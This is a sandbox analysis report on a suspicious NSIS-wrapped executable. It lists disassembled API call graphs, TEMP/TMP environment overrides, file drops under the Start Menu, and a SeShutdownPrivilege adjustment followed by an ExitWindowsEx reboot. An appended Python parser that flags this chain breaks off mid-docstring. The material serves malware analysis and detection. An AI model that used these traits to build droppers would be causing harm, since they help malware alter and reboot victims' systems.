405fda lstrcpynA 4476->4497 4498 40575a 4476->4498 4506 405db9 MoveFileExA 4476->4506 4516 405fda lstrcpynA 4478->4516 4480 405a71 4517 405a0b CharNextA CharNextA 4480->4517 4483 4057c2 4483->4441 4483->4442 4484 406244 5 API calls 4490 405a87 4484->4490 4485 405ab2 lstrlenA 4486 405abd 4485->4486 4485->4490 4487 405972 3 API calls 4486->4487 4489 405ac2 GetFileAttributesA 4487->4489 4488 4062dd 2 API calls 4488->4490 4489->4483 4490->4483 4490->4485 4490->4488 4491 4059b9 2 API calls 4490->4491 4491->4485 4492->4445 4494 4059c6 4493->4494 4495 4059d7 4494->4495 4496 4059cb CharPrevA 4494->4496 4495->4449 4496->4494 4496->4495 4497->4476 4523 405b4e GetFileAttributesA 4498->4523 4501 405787 4501->4476 4502 405775 RemoveDirectoryA 
4504 405783 4502->4504 4503 40577d DeleteFileA 4503->4504 4504->4501 4505 405793 SetFileAttributesA 4504->4505 4505->4501 4507 405dda 4506->4507 4508 405dcd 4506->4508 4507->4476 4526 405c49 4508->4526 4511 4062f3 FindClose 4510->4511 4512 405933 4510->4512 4511->4512 4512->4448 4512->4455 4514 40593d 4513->4514 4515 40598c lstrcatA 4513->4515 4514->4460 4515->4514 4516->4480 4518 405a26 4517->4518 4520 405a36 4517->4520 4518->4520 4521 405a31 CharNextA 4518->4521 4519 405a56 4519->4483 4519->4484 4520->4519 4522 40599d CharNextA 4520->4522 4521->4519 4522->4520 4524 405b60 SetFileAttributesA 4523->4524 4525 405766 4523->4525 4524->4525 4525->4501 4525->4502 4525->4503 4527 405c95 GetShortPathNameA 4526->4527 4528 405c6f 4526->4528 4530 405db4 4527->4530 4531 405caa 4527->4531 4553 405b73 GetFileAttributesA CreateFileA 4528->4553 4530->4507 4531->4530 4533 405cb2 wsprintfA 4531->4533 4532 405c79 CloseHandle GetShortPathNameA 4532->4530 4534 405c8d 4532->4534 4535 405ffc 17 API calls 4533->4535 4534->4527 4534->4530 4536 405cda 4535->4536 4554 405b73 GetFileAttributesA CreateFileA 4536->4554 4538 405ce7 4538->4530 4539 405cf6 GetFileSize GlobalAlloc 4538->4539 4540 405d18 4539->4540 4541 405dad CloseHandle 4539->4541 4542 405beb ReadFile 4540->4542 4541->4530 4543 405d20 4542->4543 4543->4541 4555 405ad8 lstrlenA 4543->4555 4546 405d37 lstrcpyA 4549 405d59 4546->4549 4547 405d4b 4548 405ad8 4 API calls 4547->4548 4548->4549 4550 405d90 SetFilePointer 4549->4550 4560 405c1a WriteFile 4550->4560 4553->4532 4554->4538 4556 405b19 lstrlenA 4555->4556 4557 405b21 4556->4557 4558 405af2 lstrcmpiA 4556->4558 4557->4546 4557->4547 4558->4557 4559 405b10 CharNextA 4558->4559 4559->4556 4561 405c38 GlobalFree 4560->4561 4561->4541 4562 4022b2 4563 402b2c 17 API calls 4562->4563 4564 4022b8 4563->4564 4565 402b2c 17 API calls 4564->4565 4566 4022c1 4565->4566 4567 402b2c 17 API calls 4566->4567 4568 4022ca 4567->4568 4569 4062dd 2 API calls 4568->4569 4570 4022d3 4569->4570 
4571 4022e4 lstrlenA lstrlenA 4570->4571 4572 4022d7 4570->4572 4574 405101 24 API calls 4571->4574 4573 405101 24 API calls 4572->4573 4576 4022df 4572->4576 4573->4576 4575 402320 SHFileOperationA 4574->4575 4575->4572 4575->4576 5775 4044b3 5776 4044c3 5775->5776 5777 4044e9 5775->5777 5778 404068 18 API calls 5776->5778 5779 4040cf 8 API calls 5777->5779 5780 4044d0 SetDlgItemTextA 5778->5780 5781 4044f5 5779->5781 5780->5777 5782 402334 5783 40233b 5782->5783 5786 40234e 5782->5786 5784 405ffc 17 API calls 5783->5784 5785 402348 5784->5785 5785->5786 5787 4056f6 MessageBoxIndirectA 5785->5787 5787->5786 4726 403235 SetErrorMode GetVersion 4727 403276 4726->4727 4728 40327c 4726->4728 4729 406372 5 API calls 4727->4729 4730 406304 3 API calls 4728->4730 4729->4728 4731 403292 lstrlenA 4730->4731 4731->4728 4732 4032a1 4731->4732 4733 406372 5 API calls 4732->4733 4734 4032a8 4733->4734 4735 406372 5 API calls 4734->4735 4736 4032af 4735->4736 4737 406372 5 API calls 4736->4737 4738 4032bb #17 OleInitialize SHGetFileInfoA 4737->4738 4816 405fda lstrcpynA 4738->4816 4741 403307 GetCommandLineA 4817 405fda lstrcpynA 4741->4817 4743 403319 4744 40599d CharNextA 4743->4744 4745 403342 CharNextA 4744->4745 4750 403352 4745->4750 4746 40341c 4747 40342f GetTempPathA 4746->4747 4818 403204 4747->4818 4749 403447 4751 4034a1 DeleteFileA 4749->4751 4752 40344b GetWindowsDirectoryA lstrcatA 4749->4752 4750->4746 4753 40599d CharNextA 4750->4753 4758 40341e 4750->4758 4828 402dc4 GetTickCount GetModuleFileNameA 4751->4828 4755 403204 12 API calls 4752->4755 4753->4750 4757 403467 4755->4757 4756 4034b5 4759 40354b 4756->4759 4762 40353b 4756->4762 4766 40599d CharNextA 4756->4766 4757->4751 4761 40346b GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4757->4761 4912 405fda lstrcpynA 4758->4912 4915 40371d 4759->4915 4764 403204 12 API calls 4761->4764 4856 4037f7 4762->4856 4768 403499 4764->4768 4769 4034d0 4766->4769 4768->4751 4768->4759 4776 403516 
4769->4776 4777 40357b 4769->4777 4770 403683 4773 403705 ExitProcess 4770->4773 4774 40368b GetCurrentProcess OpenProcessToken 4770->4774 4771 403565 4922 4056f6 4771->4922 4779 4036d6 4774->4779 4780 4036a6 LookupPrivilegeValueA AdjustTokenPrivileges 4774->4780 4782 405a60 18 API calls 4776->4782 4926 405661 4777->4926 4781 406372 5 API calls 4779->4781 4780->4779 4784 4036dd 4781->4784 4785 403521 4782->4785 4787 4036f2 ExitWindowsEx 4784->4787 4791 4036fe 4784->4791 4785->4759 4913 405fda lstrcpynA 4785->4913 4787->4773 4787->4791 4788 403591 lstrcatA 4789 40359c lstrcatA lstrcmpiA 4788->4789 4789->4759 4790 4035b8 4789->4790 4793 4035c4 4790->4793 4794 4035bd 4790->4794 4795 40140b 2 API calls 4791->4795 4934 405644 CreateDirectoryA 4793->4934 4929 4055c7 CreateDirectoryA 4794->4929 4795->4773 4796 403530 4914 405fda lstrcpynA 4796->4914 4801 4035c9 SetCurrentDirectoryA 4802 4035e3 4801->4802 4803 4035d8 4801->4803 4938 405fda lstrcpynA 4802->4938 4937 405fda lstrcpynA 4803->4937 4806 405ffc 17 API calls 4807 403622 DeleteFileA 4806->4807 4808 40362f CopyFileA 4807->4808 4813 4035f1 4807->4813 4808->4813 4809 403677 4811 405db9 36 API calls 4809->4811 4810 405db9 36 API calls 4810->4813 4811->4759 4812 405ffc 17 API calls 4812->4813 4813->4806 4813->4809 4813->4810 4813->4812 4815 403663 CloseHandle 4813->4815 4939 405679 CreateProcessA 4813->4939 4815->4813 4816->4741 4817->4743 4819 406244 5 API calls 4818->4819 4821 403210 4819->4821 4820 40321a 4820->4749 4821->4820 4822 405972 3 API calls 4821->4822 4823 403222 4822->4823 4824 405644 2 API calls 4823->4824 4825 403228 4824->4825 4826 405ba2 2 API calls 4825->4826 4827 403233 4826->4827 4827->4749 4942 405b73 GetFileAttributesA CreateFileA 4828->4942 4830 402e04 4849 402e14 4830->4849 4943 405fda lstrcpynA 4830->4943 4832 402e2a 4833 4059b9 2 API calls 4832->4833 4834 402e30 4833->4834 4944 405fda lstrcpynA 4834->4944 4836 402e3b GetFileSize 4837 402f35 4836->4837 4851 402e52 4836->4851 4945 402d60 
4837->4945 4839 402f3e 4841 402f6e GlobalAlloc 4839->4841 4839->4849 4981 4031ed SetFilePointer 4839->4981 4956 4031ed SetFilePointer 4841->4956 4843 402fa1 4845 402d60 6 API calls 4843->4845 4845->4849 4846 402f57 4850 4031d7 ReadFile 4846->4850 4847 402f89 4957 402ffb 4847->4957 4849->4756 4852 402f62 4850->4852 4851->4837 4851->4843 4851->4849 4853 402d60 6 API calls 4851->4853 4978 4031d7 4851->4978 4852->4841 4852->4849 4853->4851 4854 402f95 4854->4849 4854->4854 4855 402fd2 SetFilePointer 4854->4855 4855->4849 4857 406372 5 API calls 4856->4857 4858 40380b 4857->4858 4859 403811 4858->4859 4860 403823 4858->4860 5009 405f38 wsprintfA 4859->5009 4861 405ec1 3 API calls 4860->4861 4862 40384e 4861->4862 4864 40386c lstrcatA 4862->4864 4866 405ec1 3 API calls 4862->4866 4865 403821 4864->4865 4994 403abc 4865->4994 4866->4864 4869 405a60 18 API calls 4870 40389e 4869->4870 4871 403927 4870->4871 4873 405ec1 3 API calls 4870->4873 4872 405a60 18 API calls 4871->4872 4874 40392d 4872->4874 4875 4038ca 4873->4875 4876 40393d LoadImageA 4874->4876 4877 405ffc 17 API calls 4874->4877 4875->4871 4880 4038e6 lstrlenA 4875->4880 4884 40599d CharNextA 4875->4884 4878 4039e3 4876->4878 4879 403964 RegisterClassA 4876->4879 4877->4876 4883 40140b 2 API calls 4878->4883 4881 4039ed 4879->4881 4882 40399a SystemParametersInfoA CreateWindowExA 4879->4882 4885 4038f4 lstrcmpiA 4880->4885 4886 40391a 4880->4886 4881->4759 4882->4878 4887 4039e9 4883->4887 4889 4038e4 4884->4889 4885->4886 4890 403904 GetFileAttributesA 4885->4890 4888 405972 3 API calls 4886->4888 4887->4881 4891 403abc 18 API calls 4887->4891 4892 403920 4888->4892 4889->4880 4893 403910 4890->4893 4894 4039fa 4891->4894 5010 405fda lstrcpynA 4892->5010 4893->4886 4896 4059b9 2 API calls 4893->4896 4897 403a06 ShowWindow 4894->4897 4898 403a89 4894->4898 4896->4886 4899 406304 3 API calls 4897->4899 5002 4051d3 OleInitialize 4898->5002 4902 403a1e 4899->4902 4901 403a8f 4903 403a93 4901->4903 4904 403aab 
4901->4904 4905 403a2c GetClassInfoA 4902->4905 4907 406304 3 API calls 4902->4907 4903->4881 4910 40140b 2 API calls 4903->4910 4906 40140b 2 API calls 4904->4906 4908 403a40 GetClassInfoA RegisterClassA 4905->4908 4909 403a56 DialogBoxParamA 4905->4909 4906->4881 4907->4905 4908->4909 4911 40140b 2 API calls 4909->4911 4910->4881 4911->4881 4912->4747 4913->4796 4914->4762 4916 403735 4915->4916 4917 403727 CloseHandle 4915->4917 5012 403762 4916->5012 4917->4916 4920 4057a2 67 API calls 4921 403554 OleUninitialize 4920->4921 4921->4770 4921->4771 4923 40570b 4922->4923 4924 403573 ExitProcess 4923->4924 4925 40571f MessageBoxIndirectA 4923->4925 4925->4924 4927 406372 5 API calls 4926->4927 4928 403580 lstrcatA 4927->4928 4928->4788 4928->4789 4930 4035c2 4929->4930 4931 405618 GetLastError 4929->4931 4930->4801 4931->4930 4932 405627 SetFileSecurityA 4931->4932 4932->4930 4933 40563d GetLastError 4932->4933 4933->4930 4935 405654 4934->4935 4936 405658 GetLastError 4934->4936 4935->4801 4936->4935 4937->4802 4938->4813 4940 4056b8 4939->4940 4941 4056ac CloseHandle 4939->4941 4940->4813 4941->4940 4942->4830 4943->4832 4944->4836 4946 402d81 4945->4946 4947 402d69 4945->4947 4950 402d91 GetTickCount 4946->4950 4951 402d89 4946->4951 4948 402d72 DestroyWindow 4947->4948 4949 402d79 4947->4949 4948->4949 4949->4839 4952 402dc2 4950->4952 4953 402d9f CreateDialogParamA ShowWindow 4950->4953 4982 4063ae 4951->4982 4952->4839 4953->4952 4956->4847 4959 403011 4957->4959 4958 40303c 4960 4031d7 ReadFile 4958->4960 4959->4958 4993 4031ed SetFilePointer 4959->4993 4962 403047 4960->4962 4963 403161 4962->4963 4964 403177 4962->4964 4965 403059 GetTickCount 4962->4965 4963->4854 4966 40317b 4964->4966 4970 403193 4964->4970 4971 40306c 4965->4971 4967 4031d7 ReadFile 4966->4967 4967->4963 4968 4031d7 ReadFile 4968->4970 4969 4031d7 ReadFile 4969->4971 4970->4963 4970->4968 4972 405c1a WriteFile 4970->4972 4971->4963 4971->4969 4974 4030d2 GetTickCount 4971->4974 4975 
4030fb MulDiv wsprintfA 4971->4975 4977 405c1a WriteFile 4971->4977 4986 4064b7 4971->4986 4972->4970 4974->4971 4976 405101 24 API calls 4975->4976 4976->4971 4977->4971 4979 405beb ReadFile 4978->4979 4980 4031ea 4979->4980 4980->4851 4981->4846 4983 4063cb PeekMessageA 4982->4983 4984 4063c1 DispatchMessageA 4983->4984 4985 402d8f 4983->4985 4984->4983 4985->4839 4987 4064dc 4986->4987 4988 4064e4 4986->4988 4987->4971 4988->4987 4989 406574 GlobalAlloc 4988->4989 4990 40656b GlobalFree 4988->4990 4991 4065e2 GlobalFree 4988->4991 4992 4065eb GlobalAlloc 4988->4992 4989->4987 4989->4988 4990->4989 4991->4992 4992->4987 4992->4988 4993->4958 4995 403ad0 4994->4995 5011 405f38 wsprintfA 4995->5011 4997 403b41 4998 403b75 18 API calls 4997->4998 5000 403b46 4998->5000 4999 40387c 4999->4869 5000->4999 5001 405ffc 17 API calls 5000->5001 5001->5000 5003 4040b4 SendMessageA 5002->5003 5004 4051f6 5003->5004 5007 401389 2 API calls 5004->5007 5008 40521d 5004->5008 5005 4040b4 SendMessageA 5006 40522f OleUninitialize 5005->5006 5006->4901 5007->5004 5008->5005 5009->4865 5010->4871 5011->4997 5013 403770 5012->5013 5014 40373a 5013->5014 5015 403775 FreeLibrary GlobalFree 5013->5015 5014->4920 5015->5014 5015->5015 5788 4037b5 5789 4037c0 5788->5789 5790 4037c7 GlobalAlloc 5789->5790 5791 4037c4 5789->5791 5790->5791 5792 4014b7 5793 4014bd 5792->5793 5794 401389 2 API calls 5793->5794 5795 4014c5 5794->5795 5796 402138 5797 402b2c 17 API calls 5796->5797 5798 40213f 5797->5798 5799 402b2c 17 API calls 5798->5799 5800 402149 5799->5800 5801 402b2c 17 API calls 5800->5801 5802 402153 5801->5802 5803 402b2c 17 API calls 5802->5803 5804 40215d 5803->5804 5805 402b2c 17 API calls 5804->5805 5806 402167 5805->5806 5807 4021a9 CoCreateInstance 5806->5807 5808 402b2c 17 API calls 5806->5808 5811 4021c8 5807->5811 5813 402273 5807->5813 5808->5807 5809 401423 24 API calls 5810 4022a9 5809->5810 5812 402253 MultiByteToWideChar 5811->5812 5811->5813 5812->5813 5813->5809 
5813->5810 5070 4015bb 5071 402b2c 17 API calls 5070->5071 5072 4015c2 5071->5072 5073 405a0b 4 API calls 5072->5073 5086 4015ca 5073->5086 5074 401624 5076 401652 5074->5076 5077 401629 5074->5077 5075 40599d CharNextA 5075->5086 5079 401423 24 API calls 5076->5079 5078 401423 24 API calls 5077->5078 5080 401630 5078->5080 5085 40164a 5079->5085 5089 405fda lstrcpynA 5080->5089 5081 405644 2 API calls 5081->5086 5083 40163b SetCurrentDirectoryA 5083->5085 5084 405661 5 API calls 5084->5086 5086->5074 5086->5075 5086->5081 5086->5084 5087 40160c GetFileAttributesA 5086->5087 5088 4055c7 4 API calls 5086->5088 5087->5086 5088->5086 5089->5083 5814 40273b 5815 402741 5814->5815 5816 402745 FindNextFileA 5815->5816 5818 402757 5815->5818 5817 402796 5816->5817 5816->5818 5820 405fda lstrcpynA 5817->5820 5820->5818 5821 4016bb 5822 402b2c 17 API calls 5821->5822 5823 4016c1 GetFullPathNameA 5822->5823 5825 4016d8 5823->5825 5830 4016f9 5823->5830 5824 40170d GetShortPathNameA 5827 4029b8 5824->5827 5826 4062dd 2 API calls 5825->5826 5825->5830 5828 4016e9 5826->5828 5828->5830 5831 405fda lstrcpynA 5828->5831 5830->5824 5830->5827 5831->5830 5090 40243d 5091 402b2c 17 API calls 5090->5091 5092 40244f 5091->5092 5093 402b2c 17 API calls 5092->5093 5094 402459 5093->5094 5107 402bbc 5094->5107 5097 4029b8 5098 40248e 5099 40249a 5098->5099 5101 402b0a 17 API calls 5098->5101 5102 4024b9 RegSetValueExA 5099->5102 5104 402ffb 35 API calls 5099->5104 5100 402b2c 17 API calls 5103 402487 lstrlenA 5100->5103 5101->5099 5105 4024cf RegCloseKey 5102->5105 5103->5098 5104->5102 5105->5097 5108 402bd7 5107->5108 5111 405e8e 5108->5111 5112 405e9d 5111->5112 5113 402469 5112->5113 5114 405ea8 RegCreateKeyExA 5112->5114 5113->5097 5113->5098 5113->5100 5114->5113 5125 40523f 5126 405261 GetDlgItem GetDlgItem GetDlgItem 5125->5126 5127 4053ea 5125->5127 5171 40409d SendMessageA 5126->5171 5129 4053f2 GetDlgItem CreateThread CloseHandle 5127->5129 5130 40541a 5127->5130 5129->5130 
5174 4051d3 5 API calls 5129->5174 5131 405448 5130->5131 5133 405430 ShowWindow ShowWindow 5130->5133 5134 405469 5130->5134 5135 405450 5131->5135 5136 4054a3 5131->5136 5132 4052d1 5137 4052d8 GetClientRect GetSystemMetrics SendMessageA SendMessageA 5132->5137 5173 40409d SendMessageA 5133->5173 5141 4040cf 8 API calls 5134->5141 5139 405458 5135->5139 5140 40547c ShowWindow 5135->5140 5136->5134 5144 4054b0 SendMessageA 5136->5144 5142 405346 5137->5142 5143 40532a SendMessageA SendMessageA 5137->5143 5145 404041 SendMessageA 5139->5145 5147 40549c 5140->5147 5148 40548e 5140->5148 5146 405475 5141->5146 5149 405359 5142->5149 5150 40534b SendMessageA 5142->5150 5143->5142 5144->5146 5151 4054c9 CreatePopupMenu 5144->5151 5145->5134 5153 404041 SendMessageA 5147->5153 5152 405101 24 API calls 5148->5152 5155 404068 18 API calls 5149->5155 5150->5149 5154 405ffc 17 API calls 5151->5154 5152->5147 5153->5136 5156 4054d9 AppendMenuA 5154->5156 5157 405369 5155->5157 5158 4054f7 GetWindowRect 5156->5158 5159 40550a TrackPopupMenu 5156->5159 5160 405372 ShowWindow 5157->5160 5161 4053a6 GetDlgItem SendMessageA 5157->5161 5158->5159 5159->5146 5162 405526 5159->5162 5163 405395 5160->5163 5164 405388 ShowWindow 5160->5164 5161->5146 5165 4053cd SendMessageA SendMessageA 5161->5165 5166 405545 SendMessageA 5162->5166 5172 40409d SendMessageA 5163->5172 5164->5163 5165->5146 5166->5166 5167 405562 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5166->5167 5169 405584 SendMessageA 5167->5169 5169->5169 5170 4055a6 GlobalUnlock SetClipboardData CloseClipboard 5169->5170 5170->5146 5171->5132 5172->5161 5173->5131 5832 401b3f 5833 402b2c 17 API calls 5832->5833 5834 401b46 5833->5834 5835 402b0a 17 API calls 5834->5835 5836 401b4f wsprintfA 5835->5836 5837 4029b8 5836->5837

Control-flow Graph

                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE ref: 0040325A
                                                                                        • GetVersion.KERNEL32 ref: 00403260
                                                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403293
                                                                                        • #17.COMCTL32(?,00000006,?,0000000A), ref: 004032CF
                                                                                        • OleInitialize.OLE32(00000000), ref: 004032D6
                                                                                        • SHGetFileInfoA.SHELL32(0041ECC8,00000000,?,?,00000000,?,00000006,?,0000000A), ref: 004032F2
                                                                                        • GetCommandLineA.KERNEL32(00422F00,NSIS Error,?,00000006,?,0000000A), ref: 00403307
                                                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\jU0hAXFL0k.exe",00000020,"C:\Users\user\Desktop\jU0hAXFL0k.exe",00000000,?,00000006,?,0000000A), ref: 00403343
                                                                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,?,0000000A), ref: 00403440
                                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,?,0000000A), ref: 00403451
                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,?,0000000A), ref: 0040345D
                                                                                        • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,?,0000000A), ref: 00403471
                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,?,0000000A), ref: 00403479
                                                                                        • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,?,0000000A), ref: 0040348A
                                                                                        • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 00403492
                                                                                        • DeleteFileA.KERNELBASE(1033,?,00000006,?,0000000A), ref: 004034A6
                                                                                          • Part of subcall function 00406372: GetModuleHandleA.KERNEL32(?,?,?,004032A8,0000000A), ref: 00406384
                                                                                          • Part of subcall function 00406372: GetProcAddress.KERNEL32(00000000,?), ref: 0040639F
                                                                                          • Part of subcall function 004037F7: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens,1033,Trochidae Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Trochidae Setup: Installing,00000000,00000002,76403410), ref: 004038E7
                                                                                          • Part of subcall function 004037F7: lstrcmpiA.KERNEL32(?,.exe), ref: 004038FA
                                                                                          • Part of subcall function 004037F7: GetFileAttributesA.KERNEL32(Call), ref: 00403905
                                                                                          • Part of subcall function 004037F7: LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens), ref: 0040394E
                                                                                          • Part of subcall function 004037F7: RegisterClassA.USER32(00422EA0), ref: 0040398B
                                                                                          • Part of subcall function 0040371D: CloseHandle.KERNEL32(000002E0,00403554,?,?,00000006,?,0000000A), ref: 00403728
                                                                                        • OleUninitialize.OLE32(?,?,00000006,?,0000000A), ref: 00403554
                                                                                        • ExitProcess.KERNEL32 ref: 00403575
                                                                                        • GetCurrentProcess.KERNEL32(?,?,00000006,?,0000000A), ref: 00403692
                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00403699
                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004036B1
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036D0
                                                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 004036F4
                                                                                        • ExitProcess.KERNEL32 ref: 00403717
                                                                                          • Part of subcall function 004056F6: MessageBoxIndirectA.USER32(00409218), ref: 00405751
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                                        • String ID: "$"C:\Users\user\Desktop\jU0hAXFL0k.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers$C:\Users\user\Desktop$C:\Users\user\Desktop\jU0hAXFL0k.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`KAv$~nsu
                                                                                        • API String ID: 3776617018-374525210
                                                                                        • Opcode ID: 47f0f4bfed41ce18027c3f7b4cd283128f530326f184dcc79bdceb26c856a261
                                                                                        • Instruction ID: 70de6b230954929a2c0fab4aa6e61a8dc1a32ac2bd4530e0982157a086cffda4
                                                                                        • Opcode Fuzzy Hash: 47f0f4bfed41ce18027c3f7b4cd283128f530326f184dcc79bdceb26c856a261
                                                                                        • Instruction Fuzzy Hash: 62C1F6706086526AE7216F759D49B2F3EA8EB81706F04453FF541B61E2CB7C8E05CB2E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%
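The listing above is the entry routine of the NSIS installer stub that wraps this sample (the same listing carries the "NSIS Error" string and the ~nsu / nsz*.tmp names). It relocates TEMP and TMP via SetEnvironmentVariableA, and its tail opens the process token, looks up SeShutdownPrivilege, adjusts privileges and calls ExitWindowsEx(00000002, 80040002): uFlags 2 is EWX_REBOOT and 0x80040002 is SHTDN_REASON_FLAG_PLANNED | SHTDN_REASON_MAJOR_APPLICATION | SHTDN_REASON_MINOR_INSTALLATION, which is what the "Contains functionality to shutdown / reboot the system" signature keys on. As an added example (not part of the Joe Sandbox report and not code from the sample), the following Python parses this API-listing format, flags that reboot chain and reports the environment overrides. The regex, the helper names and the excerpted sample text are this example's own; the line format is assumed from the listing above.

```python
"""
Parse the per-function API listing the Joe Sandbox IDA plugin prints
(lines of the form '• Api.Module(arg,arg,...), ref: ADDR') and flag the
SeShutdownPrivilege -> ExitWindowsEx reboot chain plus TEMP/TMP overrides.
Example code written for this page; the line format is an assumption
taken from the listing above, the constants are documented Win32 values.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

API_LINE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[#\w]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# ExitWindowsEx uFlags bits and the SHTDN_REASON_* fields seen in this sample.
EWX_BITS = [(0x1, "EWX_SHUTDOWN"), (0x2, "EWX_REBOOT"), (0x4, "EWX_FORCE"),
            (0x8, "EWX_POWEROFF"), (0x10, "EWX_FORCEIFHUNG")]
SHTDN_MAJOR = {0x00040000: "SHTDN_REASON_MAJOR_APPLICATION"}
SHTDN_MINOR = {0x00000002: "SHTDN_REASON_MINOR_INSTALLATION"}

# Constructed sample: an excerpt of the listing for function 0x403235 above.
SAMPLE = r"""
APIs
• SetErrorMode.KERNELBASE ref: 0040325A
• GetVersion.KERNEL32 ref: 00403260
• GetCommandLineA.KERNEL32(00422F00,NSIS Error,?,00000006,?,0000000A), ref: 00403307
• GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,?,0000000A), ref: 00403440
• SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,?,0000000A), ref: 0040348A
• SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 00403492
  • Part of subcall function 00406372: GetModuleHandleA.KERNEL32(?,?,?,004032A8,0000000A), ref: 00406384
• GetCurrentProcess.KERNEL32(?,?,00000006,?,0000000A), ref: 00403692
• OpenProcessToken.ADVAPI32(00000000), ref: 00403699
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004036B1
• AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036D0
• ExitWindowsEx.USER32(00000002,80040002), ref: 004036F4
• ExitProcess.KERNEL32 ref: 00403717
"""


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                          # address of the call site
    subcall_of: Optional[int] = None  # set for 'Part of subcall function' lines


def parse_api_listing(text: str) -> List[ApiCall]:
    """Turn the listing into ApiCall records; headings and non-API lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        # Naive split: the plugin prints string arguments unquoted, so an
        # argument that itself contains a comma would be split in two.
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def decode_exit_windows_ex(args: List[str]) -> dict:
    """Decode ExitWindowsEx(uFlags, dwReason) as printed in the listing."""
    flags, reason = int(args[0], 16), int(args[1], 16)
    action = [name for bit, name in EWX_BITS if flags & bit] or ["EWX_LOGOFF"]
    return {
        "action": action,
        "planned": bool(reason & 0x80000000),   # SHTDN_REASON_FLAG_PLANNED
        "major": SHTDN_MAJOR.get(reason & 0x00FF0000, hex(reason & 0x00FF0000)),
        "minor": SHTDN_MINOR.get(reason & 0x0000FFFF, hex(reason & 0x0000FFFF)),
    }


def find_reboot_sequence(calls: List[ApiCall]) -> Optional[List[ApiCall]]:
    """Return the OpenProcessToken -> LookupPrivilegeValue(SeShutdownPrivilege)
    -> AdjustTokenPrivileges -> ExitWindowsEx chain made by the function itself
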